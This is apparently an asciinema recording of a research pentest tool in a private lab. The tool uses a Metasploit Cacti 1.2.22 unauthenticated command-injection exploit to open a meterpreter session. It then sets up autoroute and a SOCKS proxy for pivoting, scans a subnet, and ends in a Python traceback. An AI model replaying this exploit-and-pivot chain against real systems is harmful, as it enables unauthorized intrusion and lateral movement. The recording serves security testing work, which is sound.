[140.140329, "o", "\r\nTrying: exploit/linux/http/cacti_unauthenticated_cmd_injection (type: exploit)\r\nLocal IP Address: 10.0.2.15\r\nExploit: exploit/linux/http/cacti_unauthenticated_cmd_injection on 10.0.2.10:80\r\n"]
[140.176347, "o", "{0: 'Automatic (Unix In-Memory)', 1: 'Automatic (Linux Dropper)'}\r\nDo you want to select a payload (y/n)? :"]
[147.756135, "o", "y"]
[148.428471, "o", "\r\n"]
[151.546029, "o", "1. generic/custom\r\n2. generic/debug_trap\r\n3. generic/shell_bind_tcp\r\n4. generic/shell_reverse_tcp\r\n5. generic/ssh/interact\r\n6. generic/tight_loop\r\n7. linux/x64/exec\r\n8. linux/x64/meterpreter/bind_tcp\r\n9. linux/x64/meterpreter/reverse_sctp\r\n10. linux/x64/meterpreter/reverse_tcp\r\n11. linux/x64/meterpreter_reverse_http\r\n12. linux/x64/meterpreter_reverse_https\r\n13. linux/x64/meterpreter_reverse_tcp\r\n14. linux/x64/pingback_bind_tcp\r\n15. linux/x64/pingback_reverse_tcp\r\n16. linux/x64/shell/bind_tcp\r\n17. linux/x64/shell/reverse_sctp\r\n18. linux/x64/shell/reverse_tcp\r\n19. linux/x64/shell_bind_ipv6_tcp\r\n20. linux/x64/shell_bind_tcp\r\n21. linux/x64/shell_bind_tcp_random_port\r\n22. linux/x64/shell_reverse_ipv6_tcp\r\n23. linux/x64/shell_reverse_tcp\r\n24. linux/x86/chmod\r\n25. linux/x86/exec\r\n26. linux/x86/meterpreter/bind_ipv6_tcp\r\n27. linux/x86/meterpreter/bind_ipv6_tcp_uuid\r\n28. linux/x86/meterpreter/bind_nonx_tcp\r\n29. linux/x86/meterpreter/bind_tcp\r\n30. linux/x86/meterpreter/bind_tcp_uuid\r\n31. linux/x86/meterpreter/reverse_ipv6_tcp\r\n32. linux/x86/meterpreter/reverse_nonx_tcp\r\n33. linux/x86/meterpreter/reverse_tcp\r\n34. linux/x86/meterpreter/reverse_tcp_uuid\r\n35. linux/x86/meterpreter_reverse_http\r\n36. linux/x86/meterpreter_reverse_https\r\n37. linux/x86/meterpreter_reverse_tcp\r\n38. linux/x86/metsvc_bind_tcp\r\n39. linux/x86/metsvc_reverse_tcp\r\n40. linux/x86/read_file\r\n41. linux/x86/shell/bind_ipv6_tcp\r\n42. linux/x86/shell/bind_ipv6_tcp_uuid\r\n43. linux/x86/shell/bind_nonx_tcp\r\n44. linux/x86/shell/bind_tcp\r\n45. linux/x86/shell/bind_tcp_uuid\r\n46. linux/x86/shell/reverse_ipv6_tcp\r\n47. linux/x86/shell/reverse_nonx_tcp\r\n48. linux/x86/shell/reverse_tcp\r\n49. linux/x86/shell/reverse_tcp_uuid\r\n50. linux/x86/shell_bind_ipv6_tcp\r\n51. linux/x86/shell_bind_tcp\r\n52. linux/x86/shell_bind_tcp_random_port\r\n53. linux/x86/shell_reverse_tcp\r\n54. linux/x86/shell_reverse_tcp_ipv6\r\nSelect a payload by number (or press Enter to use the default): "]
[157.537023, "o", "2"]
[157.881195, "o", "9"]
[159.333921, "o", "\r\n"]
[159.333921, "o", "Selected payload: linux/x86/meterpreter/bind_tcp\r\n\r\n\r\n\u001b[93mDetected RHOSTS: 10.0.2.10\r\nDetected RPORT: 80\r\nDetected LHOST: 10.0.2.15\r\nDetected LPORT: 4444\r\nPayload set: linux/x86/meterpreter/bind_tcp\r\n\r\n\r\n\u001b[91mDo you want to exploit using exploit/linux/http/cacti_unauthenticated_cmd_injection? (y/n): \u001b[0m"]
[165.348927, "o", "y"]
[165.941223, "o", "\r\n"]
[166.077291, "o", "{'job_id': 2, 'uuid': 'npsssmzk'}\r\n\u001b[93mExploit executed, checking for sessions...\u001b[0m\r\n"]
[166.077291, "o", "{'1': {'type': 'meterpreter', 'tunnel_local': '10.0.2.1:36415', 'tunnel_peer': '10.0.2.10:4444', 'via_exploit': 'exploit/linux/http/cacti_unauthenticated_cmd_injection', 'via_payload': 'payload/linux/x86/meterpreter/bind_tcp', 'desc': 'Meterpreter', 'info': 'www-data @ 10.0.2.10', 'workspace': '', 'session_host': '10.0.2.10', 'session_port': 80, 'target_host': '10.0.2.10', 'username': 'root', 'uuid': 'uomsguxn', 'exploit_uuid': 'yku69zrd', 'routes': '', 'arch': 'x86', 'platform': 'linux'}}\r\n\u001b[92mSession opened.\u001b[0m\r\n\u001b[96mExploit successful, meterpreter session open\u001b[0m\r\n"]
[166.077291, "o", "\r\nAvailable commands:\r\n\r\n\u001b[92mpivot - sets autoroute and SOCKS proxy\r\nnetgather - get info on the target networks\r\nscan - initiate a network scan\r\nexit - exits the meterpreter session\u001b[0m\r\nEnter shell command: "]
[176.722611, "o", "p"]
[176.834667, "o", "i"]
[177.242871, "o", "v"]
[177.434967, "o", "o"]
[177.891195, "o", "t"]
[178.211355, "o", "\r\nSet the subnet network for autoroute: "]
[183.085791, "o", "1"]
[183.249873, "o", "0"]
[184.454475, "o", "."]
[184.814655, "o", "0"]
[185.134815, "o", "."]
[185.366931, "o", "2"]
[185.571033, "o", "."]
[186.031263, "o", "0"]
[187.800147, "o", "\r\n"]
[187.824159, "o", "[+] Setting up autoroute for 10.0.2.0"]
[187.824159, "o", "\r\n"]
[192.854673, "o", "[+] Starting SOCKS proxy on 127.0.0.1:1080\r\nAvailable commands:\r\n\r\n\u001b[92mpivot - sets autoroute and SOCKS proxy\r\nnetgather - get info on the target networks\r\nscan - initiate a network scan\r\nexit - exits the meterpreter session\u001b[0m\r\nEnter shell command: "]
[194.779635, "o", "p"]
[194.843667, "o", "i"]
[195.091791, "o", "v"]
[195.339915, "o", "o"]
[195.451971, "o", "t"]
[195.716103, "o", "\r\n"]
[195.716103, "o", "Set the subnet network for autoroute: "]
[196.912701, "o", "1"]
[197.016753, "o", "0"]
[197.264877, "o", "."]
[197.480985, "o", "0"]
[197.977233, "o", "."]
[198.845667, "o", "1"]
[199.033761, "o", "."]
[199.305897, "o", "0"]
[199.610049, "o", "\r\n"]
[199.630059, "o", "[+] Setting up autoroute for 10.0.1.0\r\n"]
[204.700593, "o", "[+] Starting SOCKS proxy on 127.0.0.1:1080\r\nAvailable commands:\r\n\r\n\u001b[92mpivot - sets autoroute and SOCKS proxy\r\nnetgather - get info on the target networks\r\nscan - initiate a network scan\r\nexit - exits the meterpreter session\u001b[0m\r\nEnter shell command: "]
[208.990737, "o", "s"]
[209.234859, "o", "c"]
[209.486985, "o", "a"]
[209.575029, "o", "n"]
[210.055269, "o", "\r\n\u001b[92mAuxiliary Scan\u001b[0m\r\ninsert ip address to scan: "]
[212.596539, "o", "1"]
[212.800641, "o", "0"]
[213.024753, "o", "."]
[213.232857, "o", "0"]
[213.545013, "o", "."]
[214.157319, "o", "1"]
[214.393437, "o", "."]
[214.737609, "o", "0"]
[215.405943, "o", "\r\nset subnet (e.g.24): "]
[217.659069, "o", "2"]
[217.751115, "o", "4"]
[218.311395, "o", "\r\n"]
[218.331405, "o", "\u001b[93m"]
[218.331405, "o", "\r\nScanning, please wait...\u001b[0m\r\n"]
[268.404429, "o", "Scan completed\r\n[]\r\nDo you want to gather more info about scanned hosts (y/n) ? "]
[273.767109, "o", "n"]
[274.971711, "o", "\r\n"]
[274.971711, "o", "Available commands:\r\n\r\n\u001b[92mpivot - sets autoroute and SOCKS proxy\r\nnetgather - get info on the target networks\r\nscan - initiate a network scan\r\nexit - exits the meterpreter session\u001b[0m\r\nEnter shell command: "]
[276.900675, "o", "e"]
[277.180815, "o", "x"]
[277.292871, "o", "i"]
[277.436943, "o", "t"]
[277.637043, "o", "\r\nWas the exploit successful? (y/n)? :"]
[279.045747, "o", "y"]
[279.441945, "o", "\r\nDo you want to add the exploit to TOSCA file (y/n)? :"]
[281.262855, "o", "y"]
[281.679063, "o", "\r\nFound node 'Cacti_vulnerability' of type 'pts_vulnerability'.\r\n\u001b[92mExploit saved to './sessions/session_testB.yml\u001b[0m'\r\n\r\n"]
[281.679063, "o", "\r\n\u001b[92mRegistered module: NmapScan\u001b[0m\r\nNmap is a network scanner capable of retrieving basic information about hosts and applications\r\n\r\n\u001b[92mRegistered module: WigScan\u001b[0m\r\nWig is a banner grabbing utility to detect web applications name and version\r\n\r\n\u001b[92mRegistered module: DetectWebApp\u001b[0m\r\nModule that extracts headers and meta information to determine wether a web application is running on selected host/port\r\n\r\n\u001b[92mRegistered module: CreateNode\u001b[0m\r\nCreate new TOSCA nodes manually\r\n\r\n\u001b[92mRegistered module: EditNode\u001b[0m\r\nEdit a TOSCA node manually\r\n\r\n"]
[281.679063, "o", "\u001b[92mRegistered module: MSFind\u001b[0m\r\nFind App Vulnerabilites on metasploit\r\n\r\n\u001b[92mRegistered module: ExploitFinder\u001b[0m\r\nSearches the ExploitDB database for exploits starting from a CVE number\r\n\r\n\u001b[92mRegistered module: VulnFinder\u001b[0m\r\nUses the public Penterep Api to search vulnerabilities based on vendor or product name and other parameters. Allows to filter by vulnerability type, CVSS score, or App Version\r\n\r\n\u001b[92mRegistered module: DeleteNode\u001b[0m\r\nDelete a TOSCA node from the template\r\n\r\n\r\n\u001b[0m\r\nAvailable nodes in TOSCA data:\r\n1. [\u001b[34mpts_compute\u001b[0m] \u001b[34mhost_1\u001b[0m\r\n\u001b[97m{'os': {'name': 'Linux 4.15 - 5.6'}, 'ip': '10.0.2.10', 'open_ports': [80]}\u001b[0m\r\n\r\n2. [\u001b[92mpts_webapp\u001b[0m] \u001b[92mwa10.0.2.10:80\u001b[0m\r\n\u001b[97m{'ip': '10.0.2.10', 'port_number': 80, 'app_name': 'Cacti', 'app_version': '1.2.22'}\u001b[0m\r\n\r\n3. [\u001b[93mpts_vulnerability\u001b[0m] \u001b[93mCacti_vulnerability\u001b[0m\r\n\u001b[97m{'description': 'Cacti 1.2.22 unauthenticated command injection', 'confirmed': 'true', 'host': {'node': 'wa10.0.2.10:80', 'relationship': 'hosted_on'}}\u001b[0m\r\n\r\n4. [\u001b[91mpts_exploit\u001b[0m] \u001b[91mwa_host_ms_1:exploit/linux/http/cacti_unauthenticated_cmd_injection\u001b[0m\r\n\u001b[97m{'description': 'Cacti 1.2.22 unauthenticated command injection exploit/linux/http/cacti_unauthenticated_cmd_injection', 'platform': 'Metasploit exploit', 'date': '2022-12-05', 'host': 'Cacti_vulnerability'}\u001b[0m\r\n\r\nEnter the number of the node to select (or '0' proceed without slecting a node): "]
[298.223331, "o", "Traceback (most recent call last):\r\n  File \"/home/kali/pentest_scenario/src/main.py\", line 272, in <module>\r\n    main()\r\n  File \"/home/kali/pentest_scenario/src/main.py\", line 190, in main\r\n"]
[298.223331, "o", "    node_name, selected_node = select_node(tosca_data)\r\n                               ^^^^^^^^^^^^^^^^^^^^^^^\r\n  File \"/home/kali/pentest_scenario/src/main.py\", line 114, in select_node\r\n    user_input = input(\"Enter the number of the node to select (or '0' proceed without slecting a node): \")\r\n                 ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\r\nEOFError\r\n"]
[298.247343, "o", "                                                                                                                                                                                  \r\r"]
[298.247343, "o", "\u001b]0;kali@kali: ~/pentest_scenario/src\u0007\r\n\r\u001b[0m\u001b[27m\u001b[24m\u001b[J\u001b[32m┌──(\u001b[1m\u001b[32m\u001b[34mkali㉿kali\u001b[0m\u001b[34m\u001b[32m)-[\u001b[1m\u001b[32m\u001b[39m~/pentest_scenario/src\u001b[0m\u001b[32m]\r\n└─\u001b[1m\u001b[32m\u001b[34m$\u001b[0m\u001b[34m\u001b[39m \u001b[K\u001b[?1h\u001b="]
[298.247343, "o", "\u001b[?2004h"]
[301.108773, "o", "\u001b[?2004l\r\r\n"]
